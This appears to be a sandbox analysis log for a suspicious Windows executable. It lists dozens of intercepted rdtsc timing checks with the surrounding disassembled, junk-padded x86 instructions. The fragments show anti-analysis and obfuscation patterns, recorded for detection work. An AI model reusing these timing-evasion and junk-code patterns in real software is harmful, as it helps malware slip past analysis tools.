Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1726C7E second address: 1726C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FEEDCB1F6D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1720E72 second address: 1720E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1720E77 second address: 1720E7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1721EE6 second address: 1721EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1721EEA second address: 1721F08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1721F08 second address: 1721F12 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEEDCB2F2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1727B9A second address: 1727BCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FEEDCB1F6E5h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1720E7C second address: 1720F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEEDCB2F2E6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+122D20CAh], esi 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007FEEDCB2F2E8h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 push esi 0x00000038 mov ebx, dword ptr [ebp+122D1F38h] 0x0000003e pop ebx 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 sub dword ptr [ebp+12452238h], edx 0x0000004c mov eax, dword ptr [ebp+122D0FA1h] 0x00000052 jmp 00007FEEDCB2F2F9h 0x00000057 push FFFFFFFFh 0x00000059 mov dword ptr [ebp+122D2275h], edi 0x0000005f nop 0x00000060 jne 00007FEEDCB2F2F0h 0x00000066 push eax 0x00000067 pushad 0x00000068 jne 00007FEEDCB2F2E8h 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FEEDCB2F2F7h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1724D97 second address: 1724DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FEEDCB1F6D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1725CF3 second address: 1725D1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FEEDCB2F2E6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1726D97 second address: 1726DA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB1F6DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1724DA1 second address: 1724DB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jl 00007FEEDCB2F2E6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1727D05 second address: 1727DB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FEEDCB1F6D8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov ebx, 5E50AF81h 0x00000029 push dword ptr fs:[00000000h] 0x00000030 mov di, bx 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a and ebx, 557F65C7h 0x00000040 sub dword ptr [ebp+122D2F3Dh], eax 0x00000046 mov eax, dword ptr [ebp+122D0FA9h] 0x0000004c push 00000000h 0x0000004e push ecx 0x0000004f call 00007FEEDCB1F6D8h 0x00000054 pop ecx 0x00000055 mov dword ptr [esp+04h], ecx 0x00000059 add dword ptr [esp+04h], 0000001Dh 0x00000061 inc ecx 0x00000062 push ecx 0x00000063 ret 0x00000064 pop ecx 0x00000065 ret 0x00000066 xor dword ptr [ebp+122D3083h], edi 0x0000006c push FFFFFFFFh 0x0000006e mov edi, eax 0x00000070 nop 0x00000071 pushad 0x00000072 jmp 00007FEEDCB1F6E0h 0x00000077 pushad 0x00000078 jmp 00007FEEDCB1F6E2h 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1725D1A second address: 1725D34 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEEDCB2F2F2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1726DA8 second address: 1726DB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1724DB8 second address: 1724DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1726DB6 second address: 1726DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 172402D second address: 1724032 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1728DBE second address: 1728E5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FEEDCB1F6D8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+122D29A7h] 0x0000002d mov ebx, dword ptr [ebp+122D36C6h] 0x00000033 push dword ptr fs:[00000000h] 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007FEEDCB1F6D8h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 sbb edi, 7CA09090h 0x0000005a mov dword ptr fs:[00000000h], esp 0x00000061 movzx ebx, cx 0x00000064 sbb bx, 2A2Eh 0x00000069 mov eax, dword ptr [ebp+122D0211h] 0x0000006f js 00007FEEDCB1F6DCh 0x00000075 push FFFFFFFFh 0x00000077 mov edi, dword ptr [ebp+122D2F68h] 0x0000007d nop 0x0000007e jbe 00007FEEDCB1F6E4h 0x00000084 push eax 0x00000085 push edx 0x00000086 push ebx 0x00000087 pop ebx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1728E5D second address: 1728E84 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEEDCB2F2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jg 00007FEEDCB2F301h 0x00000011 pushad 0x00000012 jmp 00007FEEDCB2F2F3h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 172E753 second address: 172E757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173245C second address: 1732462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1732462 second address: 1732470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FEEDCB1F6DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1732470 second address: 1732474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1732474 second address: 173248A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FEEDCB1F6D6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173248A second address: 173248E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173248E second address: 17324A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FEEDCB1F6D6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16D6E2E second address: 16D6E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16D6E32 second address: 16D6E4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DCh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FEEDCB1F6D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16D6E4E second address: 16D6E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16D6E52 second address: 16D6E61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1739951 second address: 1739969 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEEDCB2F2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FEEDCB2F2EEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16CB029 second address: 16CB044 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FEEDCB1F6EAh 0x0000000c pushad 0x0000000d jne 00007FEEDCB1F6D6h 0x00000013 jl 00007FEEDCB1F6D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173AE83 second address: 173AE94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB2F2EDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173AE94 second address: 173AE98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173AE98 second address: 173AEAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FEEDCB2F2E6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173AEAD second address: 173AEB7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173AEB7 second address: 173AEBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173B009 second address: 173B045 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FEEDCB1F6E7h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007FEEDCB1F6E5h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173B045 second address: 173B057 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173B057 second address: 173B060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173B060 second address: 173B064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1740198 second address: 17401B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 jmp 00007FEEDCB1F6E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16C60B2 second address: 16C60E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FEEDCB2F2E6h 0x0000000a popad 0x0000000b jp 00007FEEDCB2F2F2h 0x00000011 jno 00007FEEDCB2F2EEh 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007FEEDCB2F2E6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16C60E7 second address: 16C60EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173EEE2 second address: 173EF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FEEDCB2F2F6h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FEEDCB2F2EEh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173EF03 second address: 173EF07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173EF07 second address: 173EF13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007FEEDCB2F2E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173F600 second address: 173F605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173F7A2 second address: 173F7AB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173F910 second address: 173F92E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E8h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173FBEB second address: 173FBF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173FBF5 second address: 173FBF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173FBF9 second address: 173FC36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jg 00007FEEDCB2F31Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FEEDCB2F2F4h 0x00000017 jmp 00007FEEDCB2F2F2h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17448AA second address: 17448B6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEEDCB1F6D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17448B6 second address: 17448CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17448CB second address: 17448D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FEEDCB1F6D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17448D5 second address: 17448D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17448D9 second address: 1744909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB1F6E6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007FEEDCB1F6E4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1744909 second address: 1744911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1718D2D second address: 1718D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB1F6E4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1718D46 second address: 1718D5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB2F2F0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1718D5A second address: 1718D7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1718D7B second address: 1718D85 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEEDCB2F2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1718D85 second address: 1718D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB1F6E5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1718D9E second address: 1718DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1718DA2 second address: 1718DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEEDCB1F6DEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1718DBD second address: 1718DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1718EFA second address: 1718F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, esi 0x00000006 mov ecx, 383E2000h 0x0000000b movzx ecx, bx 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FEEDCB1F6DCh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1719203 second address: 1719209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1719625 second address: 171962D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171962D second address: 1719674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 xor ecx, 50437201h 0x0000000f push 0000001Eh 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FEEDCB2F2E8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b pushad 0x0000002c mov dword ptr [ebp+122D3838h], edx 0x00000032 mov esi, 42B08600h 0x00000037 popad 0x00000038 nop 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jc 00007FEEDCB2F2E6h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1719674 second address: 1719678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1719678 second address: 1719688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16C7BD4 second address: 16C7C01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB1F6E6h 0x00000009 jmp 00007FEEDCB1F6E3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16C7C01 second address: 16C7C07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16C7C07 second address: 16C7C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEEDCB1F6E6h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e jmp 00007FEEDCB1F6DBh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
